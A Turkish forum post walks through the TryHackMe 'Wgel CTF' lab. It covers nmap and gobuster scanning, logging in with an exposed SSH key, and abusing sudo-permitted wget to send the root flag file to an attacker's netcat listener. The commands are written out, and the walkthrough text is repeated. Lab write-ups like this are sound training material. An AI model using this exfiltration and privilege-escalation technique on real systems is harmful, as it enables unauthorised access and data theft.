- 10 Ağu 2019
- 985
- 17
TryHackMe: Wgel CTF Çözümleri
https://tryhackme.com/room/wgelctf
Zorluk Seviyesi: Kolay
Amaç: root ve user bayraklarına erişmek.
Nmap taraması gerçekleştirdiğimizde 22. ve 80. yani ssh ve http portlarının açık olduğunu görüyoruz.
80. port ile websiteye girdiğimzide bizi klasik apache ekranı karşılıyor ancak kaynak kodlarını incelediğimizde dikkatimizi çeken bir isim ile karşılaşıyoruz.
Websitesine "common.txt" dosyası ile gobuster taraması gerçekleştirdiğimizde websitenin sitemap'i ile karşılaşıyoruz. Ancak siteyi araştırdığımızda hiçbir şey ile karşılaşamıyoruz. Aynı şekilde sitemap directorysine gobuster taraması gerçekleştirdiğimizde ise içerisinde ssh id barındıran bir directory ile karşılaşıyoruz. Bulduğumuz ssh id'yi indiriyoruz.
(http://10.10.200.254/sitemap/.ssh/)
İndirmiş olduğumuz ssh id ve kaynak kodunda bulduğumuz isim ile yaptığımız nmap taramasında açık olduğunu gördüğümüz ssh portuna giriş yapmaya çalıştığımızda başarılı oluyoruz.
https://tryhackme.com/room/wgelctf
Zorluk Seviyesi: Kolay
Amaç: root ve user bayraklarına erişmek.
Nmap taraması gerçekleştirdiğimizde 22. ve 80. yani ssh ve http portlarının açık olduğunu görüyoruz.
Kod:
nmap -sC -sV 10.10.200.254
80. port ile websiteye girdiğimzide bizi klasik apache ekranı karşılıyor ancak kaynak kodlarını incelediğimizde dikkatimizi çeken bir isim ile karşılaşıyoruz.
Websitesine "common.txt" dosyası ile gobuster taraması gerçekleştirdiğimizde websitenin sitemap'i ile karşılaşıyoruz. Ancak siteyi araştırdığımızda hiçbir şey ile karşılaşamıyoruz. Aynı şekilde sitemap directorysine gobuster taraması gerçekleştirdiğimizde ise içerisinde ssh id barındıran bir directory ile karşılaşıyoruz. Bulduğumuz ssh id'yi indiriyoruz.
(http://10.10.200.254/sitemap/.ssh/)
Kod:
gobuster dir -u http://10.10.200.254/sitemap -w /usr/share/dirb/wordlists/common.txt
İndirmiş olduğumuz ssh id ve kaynak kodunda bulduğumuz isim ile yaptığımız nmap taramasında açık olduğunu gördüğümüz ssh portuna giriş yapmaya çalıştığımızda başarılı oluyoruz.
Kod:
[CENTER][COLOR=White]ssh -i id_rsa [email protected][/COLOR][/CENTER]
Klasörlerin içerisinde biraz dolaştığımızda "********s" klasörünün içerisinde "user_flag.txt" isimli bir dosya ile karşılaşıyoruz. Açtığımızda user flagini görüyoruz.
"sudo -l" komutu ile bağlantı kurduğumuz "jessie" kullanıcısın root yetkisine sahip olduğu alanları incelediğimizde wget ile karşılaşıyoruz. İnternette biraz araştırma sonucu wget ile privilege escalation yapabileceğimizi görüyoruz.
(https://www.hackingarticles.in/linux-for-pentester-wget-privilege-escalation/)
Netcat üzerinden 4445. portu dinlemeye alıyoruz. Dinlemeye aldıktan sonra bağlanmış olduğumuz ssh üzerinden wget ile yetki yükseltimi için gerekli olan kodu girdiğimizde netcatde root flagi ile karşılaşıyoruz.
Kod:
[CENTER][COLOR=White]sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.92.145:4445[/COLOR][/CENTER]
Son düzenleme: